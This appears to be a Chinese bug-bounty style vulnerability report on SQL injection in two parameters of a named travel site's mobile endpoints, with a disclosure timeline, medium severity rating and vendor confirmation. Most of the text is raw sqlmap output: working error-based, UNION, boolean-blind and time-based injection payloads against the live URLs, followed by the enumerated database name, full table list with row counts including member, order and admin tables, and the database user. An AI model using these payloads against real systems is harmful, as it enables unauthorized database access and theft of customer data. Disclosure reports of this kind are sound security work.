2015-10-08: 细节已通知厂商并且等待厂商处理中 2015-10-09: 厂商已经确认,细节仅向厂商公开 2015-10-19: 细节向核心白帽子及相关领域专家公开 2015-10-29: 细节向普通白帽子公开 2015-11-08: 细节向实习白帽子公开 2015-11-23: 细节向公众公开
...
大众网旗下点:http://m.zyql.cn/?m=android/scenic.scenicTypelist&scenicType=1http://m.zyql.cn/?m=android/scenic.scenicZb&cityId=
sqlmap identified the following injection points with a total of 205 HTTP(s) requests:---Place: GETParameter: scenicType Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicTypelist&scenicType=1' AND (SELECT 5522 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (5522=5522) THEN 1 ELSE 0 END)),0x3a6772783a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UYtf'='UYtf Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 39 columns Payload: m=android/scenic.scenicTypelist&scenicType=1' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6572693a,0x6d496b7673635664784c,0x3a6772783a), NULL# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL#---sqlmap identified the following injection points with a total of 215 HTTP(s) requests:---Place: GETParameter: cityId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=android/scenic.scenicZb&cityId=' AND 6041=6041 AND 'HKty'='HKty Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicZb&cityId=' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(0x3a7678613a,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x3a6468643a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'egWz'='egWz Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=android/scenic.scenicZb&cityId=' AND SLEEP(5) AND 'SIEO'='SIEO Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cityId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=android/scenic.scenicZb&cityId=' AND 6041=6041 AND 'HKty'='HKty Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicZb&cityId=' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(0x3a7678613a,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x3a6468643a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'egWz'='egWz Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=android/scenic.scenicZb&cityId=' AND SLEEP(5) AND 'SIEO'='SIEO Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---available databases [2]:[*] information_schema[*] zhouyouqilusqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: scenicType Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicTypelist&scenicType=1' AND (SELECT 5522 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (5522=5522) THEN 1 ELSE 0 END)),0x3a6772783a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UYtf'='UYtf Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 39 columns Payload: m=android/scenic.scenicTypelist&scenicType=1' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6572693a,0x6d496b7673635664784c,0x3a6772783a), NULL# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL#---available databases [2]:[*] information_schema[*] zhouyouqilusqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: scenicType Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicTypelist&scenicType=1' AND (SELECT 5522 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (5522=5522) THEN 1 ELSE 0 END)),0x3a6772783a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UYtf'='UYtf Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 39 columns Payload: m=android/scenic.scenicTypelist&scenicType=1' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6572693a,0x6d496b7673635664784c,0x3a6772783a), NULL# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL#---Database: zhouyouqilu+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| jd_hotel_api | 68391 || jd_hotel | 68365 || my_order_scenic | 28732 || my_msg_log | 27289 || my_order_scenic_zhj_0901 | 25069 || my_order_scenic_zhj | 25051 || my_order_scenic_zhj_copy | 25051 || my_order_scenic_828 | 25045 || my_admin_log | 24566 || my_order_scenic_813 | 23608 || ecs_scenic_order_ticket | 21306 || ecs_scenic_order | 20701 || ecs_sms_logs | 20003 || my_member | 19556 || btob_order | 18751 || btob_order_log | 16954 || ecs_users | 15659 || btob_money_log | 15504 || el_poi_copy | 13021 || btob_print_log | 11635 || btob_msg_log | 8759 || my_bonus_send | 6228 || btob_member_authority | 5666 || btob_order_return | 5371 || btob_member_log | 3880 || my_trace | 3419 || ecs_region | 3408 || el_poi | 3408 || v9_linkage | 3284 || t_tttuangou_regions | 3266 || v9_log | 2446 || my_photo | 1548 || btob_pay_log | 1305 || my_scenic_ticket | 1005 || t_tttuangou_reports | 984 || my_order_log_zypw | 892 || btob_consume | 860 || jd_ncity | 821 || ecs_scenic_ticket | 814 || btob_verify_push_zyql | 799 || my_order_scenic_i | 531 || my_scenic_comment | 444 || ecs_scenic_comment | 436 || t_system_robot_ip | 384 || jd_city | 375 || my_rural_ticket | 360 || my_scenic | 308 || v9_menu | 287 || t_system_robot_log | 278 || my_seckill_order_scenic_log | 260 || my_order_line | 241 || v9_admin_role_priv | 241 || ecs_scenic | 230 || tao_cancel | 227 || my_rural | 217 || btob_scenic | 187 || btob_scenic_ticket | 151 || v9_model_field | 143 || my_article | 141 || btob_member | 135 || t_system_role_action | 98 || t_tttuangou_zlog | 96 || v9_special_content | 95 || my_raiders | 89 || my_order_rural | 87 || btob_notice | 80 || my_scenic_admin | 78 || v9_attachment | 69 || jd_module | 68 || my_seckill_order_scenic | 67 || ecs_scenic_admin | 63 || v9_attachment_index | 58 || my_scenic_type | 56 || v9_category_priv | 49 || my_line | 34 || tao_order | 33 || v9_cache | 33 || btob_finance | 32 || v9_type | 31 || my_pay | 30 || my_finance | 29 || v9_hits | 29 || jd_rewrite | 25 || v9_search | 24 || btob_level | 22 || jd_purview | 22 || my_level | 22 || t_tttuangou_express_corp | 20 || btob_pay | 19 || btob_scenic_type | 18 || jd_keywords | 18 || t_system_role_module | 18 || my_type | 17 || tao_reverse | 16 || v9_module | 16 || my_rural_type | 15 || tao_consume_logs | 15 || jd_article | 14 || tao_resend | 14 || btob_api_push | 13 || jd_sysconfig | 13 || my_area_blacklist | 13 || my_scenic_stock | 13 || jd_layout | 12 || v9_position | 12 || v9_poster_space | 11 || my_finance_log | 10 || t_tttuangou_metas | 10 || v9_poster | 10 || v9_zyqlproduct | 10 || v9_zyqlproduct_data | 10 || my_bonus_type | 9 || my_scenic_price | 9 || t_tttuangou_uploads | 8 || v9_ad | 8 || v9_ad_data | 8 || v9_keyword_data | 8 || v9_urlrule | 8 || el_tmporderinfo | 7 || t_system_members | 7 || t_system_robot | 7 || t_system_role | 7 || t_tttuangou_product | 7 || v9_category | 7 || v9_member_group | 7 || v9_model | 7 || my_authorize | 6 || t_tttuangou_payment | 6 || v9_admin_role | 6 || v9_special | 6 || my_question | 5 || t_tttuangou_order | 5 || v9_keyword | 5 || v9_news | 5 || v9_news_data | 5 || v9_sso_settings | 5 || jd_flink | 4 || t_tttuangou_city | 4 || t_tttuangou_paylog | 4 || t_tttuangou_service | 4 || v9_workflow | 4 || jd_admin | 3 || jd_adminlog | 3 || jd_admintype | 3 || jd_usergroup | 3 || my_admin | 3 || my_rural_comment | 3 || t_system_onlinetime | 3 || t_tttuangou_seller | 3 || v9_member_menu | 3 || api_publish | 2 || btob_order_reserve | 2 || jd_ad | 2 || jd_article_class | 2 || my_activity | 2 || my_appmoney | 2 || my_line_comment | 2 || my_module | 2 || t_system_failedlogins | 2 || t_tttuangou_subscribe | 2 || v9_admin | 2 || v9_poster_201408 | 2 || v9_site | 2 || btob_btoc_scenic_ticket_reserve_config | 1 || btob_push_task_list | 1 || btob_reverse | 1 || my_sale | 1 || t_system_memberfields | 1 || t_system_sessions | 1 || t_tttuangou_address | 1 || t_tttuangou_express | 1 || t_tttuangou_push_template | 1 || v9_poster_201509 | 1 || v9_session | 1 || v9_special_c_data | 1 || v9_sso_admin | 1 || v9_sso_applications | 1 |+----------------------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: scenicType Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicTypelist&scenicType=1' AND (SELECT 5522 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (5522=5522) THEN 1 ELSE 0 END)),0x3a6772783a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UYtf'='UYtf Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 39 columns Payload: m=android/scenic.scenicTypelist&scenicType=1' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6572693a,0x6d496b7673635664784c,0x3a6772783a), NULL# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL#---database management system users [1]:[*] 'zhouyouqilu'@'%'
ok
···
改
危害等级:中
漏洞Rank:5
确认时间:2015-10-09 12:42
老板没来,研发去财务了
暂无
